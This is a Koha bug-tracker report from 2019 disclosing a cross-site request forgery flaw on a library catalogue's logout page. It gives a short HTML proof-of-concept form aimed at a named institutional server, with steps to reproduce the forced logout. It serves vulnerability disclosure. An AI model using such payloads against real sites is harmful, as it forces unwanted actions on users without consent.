[Koha-bugs] [Bug 23238] New: CSRF On Logout Page
bugzilla-daemon at bugs.koha-community.org
Sun Jun 30 14:48:48 CEST 2019
https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=23238
Bug ID: 23238
Summary: CSRF On Logout Page
Change sponsored?: ---
Product: Koha
Version: unspecified
Hardware: All
OS: All
Status: NEW
Severity: normal
Priority: P5 - low
Component: Web services
Assignee: koha-bugs at lists.koha-community.org
Reporter: anuragmewar at gmail.com
QA Contact: testopia at bugs.koha-community.org
Created attachment 91132: https://bugs.koha-community.org/bugzilla3/attachment.cgi?id=91132&action=edit
PFA the Google Drive link for the video
Vulnerability: CSRF on logout page
Vulnerability Description: Cross-Site Request Forgery (CSRF) is an attack that
forces an end user to execute unwanted actions on a web application in which
they're currently authenticated. With a little help from social engineering (such
as sending a link via email or chat), an attacker may trick the users of a web
application into executing actions of the attacker's choosing.
Vulnerable URL: https://ils.ddn.upes.ac.in:8001/cgi-bin/koha/opac-main.pl
CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ils.ddn.upes.ac.in:8001/cgi-bin/koha/opac-main.pl">
<input type="hidden" name="logout.x" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Steps to reproduce:
1. Log in with valid credentials
2. Start any proxy tool to intercept the request.
3. Click logout
4. Send to "repeater"
5. Change "referer" header
6. Observe the output
7. Create an HTML file using the CSRF POC mentioned above
8. Log in again
9. Open the CSRF html file in a new tab
10. Submit request
11. Results would reflect on main account
POC:
PFA the video